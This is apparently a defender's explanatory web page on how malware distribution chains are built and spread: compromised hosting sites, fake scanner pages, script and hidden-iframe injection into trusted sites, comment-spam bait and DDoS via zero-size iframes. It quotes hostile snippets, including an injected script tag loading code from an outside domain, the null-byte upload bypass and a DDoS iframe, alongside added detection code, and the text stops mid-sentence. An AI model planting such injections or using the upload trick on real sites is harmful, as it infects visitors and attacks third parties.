W.O.P.R STORM monitor - Rationale, or Understanding your enemy


NB undergoing changes

The tree structure of the malware process.

On this page you will find a graphical representation of the tree structure of the malware. Hovering the mouse over a node shows a small popup; to go to the full explanation, just click on the picture. After the picture, there are explanations about
  1. Sites
  2. The install process
  3. The browsing process
  4. DDoS attacks using servers instead of PC zombies
This page was developed by monitoring thousands of attempts to inject code/spam on a site. By logging, watching and backtracing the various URLs, this pattern shows up in almost every instance.
[Picture showing the malware process]

Description of the sites

The Endpoint

Servers - or sites - where the malware is hosted. Typically, these are sites which are infected, and not owned by the criminals.
The malware is placed in many variations of ways: the files can be placed using FTP, SSH, a vulnerable HTML upload etc. But I have also seen malware hosted in a photo gallery. This is done by uploading the exe file as a picture: filename.exe%00.jpg Notice the %00 part, which is the URL-encoded null byte (hexadecimal zero) and terminates the string. Apart from direct upload, the criminals use PHP code to place files. Examples are r57shell and namogofer. An example of a Danish company which was used as a placeholder is described in this article: http://www.version2.dk/artikel/7100
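As an added example (not code from the original page), here is the filename.exe%00.jpg trick in Python: a naive extension check on the raw upload name accepts it, a C-style string stops at the null byte, and a hardened check decodes first and rejects it. ALLOWED_EXT and the function names are hypothetical.

```python
import os
from urllib.parse import unquote

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}   # what the gallery is supposed to accept


def naive_is_image(filename: str) -> bool:
    """The weak check: looks at the raw, still URL-encoded name, so
    'filename.exe%00.jpg' passes because it ends in .jpg."""
    return filename.lower().endswith(tuple(ALLOWED_EXT))


def stored_name_c_style(filename: str) -> str:
    """What a C-style string sees after URL decoding: the %00 becomes a NUL
    byte that terminates the string, so only 'filename.exe' remains."""
    decoded = unquote(filename)
    return decoded.split("\x00", 1)[0]


def hardened_is_image(filename: str) -> bool:
    """Decode first, reject NUL/control bytes and any path component, then
    check the extension of the name that would actually be stored."""
    decoded = unquote(filename)
    if any(ord(c) < 0x20 for c in decoded):         # catches the \x00 from %00
        return False
    base = os.path.basename(decoded.replace("\\", "/"))
    if base != decoded or base in ("", ".", ".."):  # no directories, no traversal
        return False
    return os.path.splitext(base)[1].lower() in ALLOWED_EXT
```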

Phishing/fake - site

Contains phishing/fake scanners and/or porn. Some malware simulates virus scanning, others show up as a need to update a video codec, or a Flash update.
They can be difficult to investigate, since I have seen examples of 'sites' which:
  1. Activate a fake scanner
  2. On the next visit show some kind of porn
  3. On every visit after that show a 404 Not Found (but the header is 200 OK)
This is probably done by changing rewrite rules in .htaccess. Each 'instance' of the malware has its own directory - I stumbled upon a site where there were 400 directories, each containing various versions of the malware. Some of the sites only contain various scripts to redirect to the endpoint. By using a separate site, the criminals add an extra layer to lay out a 'smoke trail'. I have put together some screen shots of real malware in the wild here. Also a couple of reproduced playbacks, which are sourced from the real world but with modified URIs to keep inside this domain.

Intermediate sites

These sites are normal, trusted sites. By injecting code, the visitor will be redirected to a fake/phishing site, or directly to the endpoint.
By trusted sites, I mean publicly trusted sites - government, companies etc. - sites that people really trust. The goal is to inject a simple piece of <script> or <iframe> which will be executed automatically when the user visits the site. It basically does nothing but load the layer from the fake/phishing sites. An example of a script tag:
<script src=http://www.adwadb.mobi/ngg.js></script>
But not all users are affected all the time; here is a JavaScript example from the wild:
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
    /* the loader for the fake/phishing layer follows here; the rest of the script is not reproduced on this page */
}
Notice here that only browsers with a language code different from the above list will be affected. It may give some hint about the origin of the code. Another thing that makes it difficult to find upfront: some scripts, when loaded, point to msn.com in an <iframe>, and not to the malware script from the phishing sites. Furthermore there is a counter, so the criminals can see how many potential targets (users) are active. When there are 'enough', they simply replace the script to point at the phishing/malware site. Say there are 1000 active targets: all of them are invoked by changing one single file. So the build-up process, with redirecting to msn.com, can go on (undiscovered) for days, weeks, maybe more, since msn.com has so many hits that a thousand more or less doesn't raise an alert.

Just a little note: the malware coders are sometimes kind of arrogant; they use JavaScript like this: var fuckAntivirus = something.

But this layer is also used to launch DDoS attacks. See DDoS attacks. There are several ways to inject the tags, but the common ones are:

Trusted sites

These sites are typically blogs or systems where you can post a comment. Basically all sites where you can post some kind of link, including Facebook, Twitter etc.
On these systems, the posted content does not contain malware or <script> tags. Typically, it is things like:
  1. See (some celebrity nude) here
  2. Look at this video with asian porn here
  3. Buy viagra cheap here
  4. Fantastic financial offer, look here
The links do not point to the malware itself, but to intermediate sites (so the URL looks trustworthy). When the user clicks on the link, he will be redirected from the intermediate site, over the phishing site and eventually to the malware. I have put together some screen shots of real malware in the wild here, where the visual part came from phishing sites. Also a couple of reproduced playbacks, which are sourced from the real world but with modified URIs to keep inside this domain. The playbacks show the user experience when going through the process.

Description of the Construction process

Initial placeholders

The first step in the construction is to find a vulnerable server on which to place the malware. There are various methods to probe for access:
  1. Dictionary attack against SSH
  2. Dictionary attack, or default user/password, against FTP
  3. Execution of remote code (PHP)
  4. SQL injection
Dictionary attacks against SSH use common usernames/passwords. In the log files you can see attempts to log on as root, admin, john, jane etc. When using FTP, such as FileZilla, a default user/password is installed. If you don't change these, you are inviting an infection. Execution of PHP code is very common. Probes for vulnerability are done by sending references to code in the query string, such as: The probes typically do nothing harmful, but return information about the system. See example. Another example is the namogofer, which just does: echo md5("just_a_test") When it receives a positive response, it signals vulnerability.

Phishing/fake install

The methods for finding sites to place this part are the same as described under Initial placeholders.

Installing redirectors

The methods for finding sites to place this part are the same as described under Initial placeholders.

Installing bait

There are various methods to bait. The obvious one is email, but on the server side there are things like making blog/comment entries with multiple links to intermediate sites, with keywords such as 'buy viagra', 'see person xyz nude', 'asian porn' etc.
It is done by inspecting the HTML for <form> tags with method="post", and simply POSTing to them with the links etc. The POSTs are made according to the field name, so 'email' will contain some kind of email address, while 'message' and 'comment' contain links formed as <a href=.. or encapsulated in []. Another action is to use the link to intermediate sites as the referrer. When the webmaster sees it in his statistics, he might click the link, and might risk getting infected. Links to intermediate sites can also be posted on Facebook, Twitter and other sites.

Description of the User browsing process

Requesting malware

Here the user (without his knowledge) requests the malware.

User gets infected

By visiting the endpoint, which contains malware, the user (maybe) gets infected.

User redirect endpoint

(note: language codes).

User requesting phishing

(note: language codes).

User browsing phishing site

(note: language codes).

User redirect to phishing

(note: language codes).

Requesting intermediate

(note: language codes).

User browsing intermediate

(note: language codes).

Requesting starting point

(note: User thinks it's ok).

User will be redirected, doesn't observe anything

(note: iframe see xoomer).

The innocent/naive user

(note: Thinks the site is ok).

Description of the DDoS process

The innocent user participates in DDoS attacks

(note: through iframe, bots (server/PHP)). This is done by injecting <iframe> tags where the 'src=' points to the victim.
To hide the request from the users, it is defined with zero size, as in this example:
<iframe src=http://the.DDoS.victim width=0 height=0 frameborder=0></iframe>
There are two ways to inject on the trusted sites. One is file injection: when the hacker has gained access to the server, it is done by running a program. This program traverses the directory where the files are located, and inserts/appends the tags into every .php, .htm, .html and .asp file, thereby activating the intermediate layer for every single page.
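As an added example (not code from the original page), a small Python scanner a site owner could run over a web root to find the two injected tags described on this page: a <script src=...> pulling from a foreign host (the loader shown under Intermediate sites) and a zero-size <iframe> like the one above. SITE_HOST, the WEB_EXTS list and SAMPLE_HTML are constructed assumptions.

```python
import os
import re

SITE_HOST = "www.example.org"                 # hypothetical: host of the site being scanned
WEB_EXTS = (".php", ".htm", ".html", ".asp")  # file types the page says get injected

TAG_RE = re.compile(r"<(script|iframe)\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def _attrs(raw: str) -> dict:
    """Parse quoted or unquoted tag attributes into a lower-cased dict."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(raw)}


def _host_of(url: str) -> str:
    m = re.match(r"^(?:https?:)?//([^/:?#]+)", url.strip(), re.I)
    return m.group(1).lower() if m else ""      # '' for relative URLs


def scan_html(html: str) -> list:
    """Return (finding, src) pairs for the injected-looking tags in one page."""
    findings = []
    for m in TAG_RE.finditer(html):
        tag, attrs = m.group(1).lower(), _attrs(m.group(2))
        src = attrs.get("src", "")
        if tag == "script" and _host_of(src) and _host_of(src) != SITE_HOST:
            findings.append(("external-script", src))    # loader pulled from a foreign host
        elif tag == "iframe":
            size = {attrs.get("width", "").rstrip("px"), attrs.get("height", "").rstrip("px")}
            if "0" in size:
                findings.append(("hidden-iframe", src))  # zero-size frame the user never sees
    return findings


def scan_tree(root: str) -> dict:
    """Walk a web root and report the findings per injected file."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(WEB_EXTS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_html(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample page: one legitimate script, one injected loader, one hidden iframe.
SAMPLE_HTML = """<html><head><script src="/js/site.js"></script>
<script src=http://injected.example/ngg.js></script></head><body>
<iframe src=http://the.DDoS.victim width=0 height=0 frameborder=0></iframe>
<iframe src="https://www.example.org/embed" width="300" height="200"></iframe></body></html>"""
```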

The innocent user participates in DDoS attacks

(note: see #20 - redundant).

The DDoS victim

(note: zombies, 'tin soldiers', server side (create process)).
There are two ways to get the users into the trap.

Redirector - The user redirector (NB: to be integrated above)

One of them is by issuing direct links to the user. This is done by things like: